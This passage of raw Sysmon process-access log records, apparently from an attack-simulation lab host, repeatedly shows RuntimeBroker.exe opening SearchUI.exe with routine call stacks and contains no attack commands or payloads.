indows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windo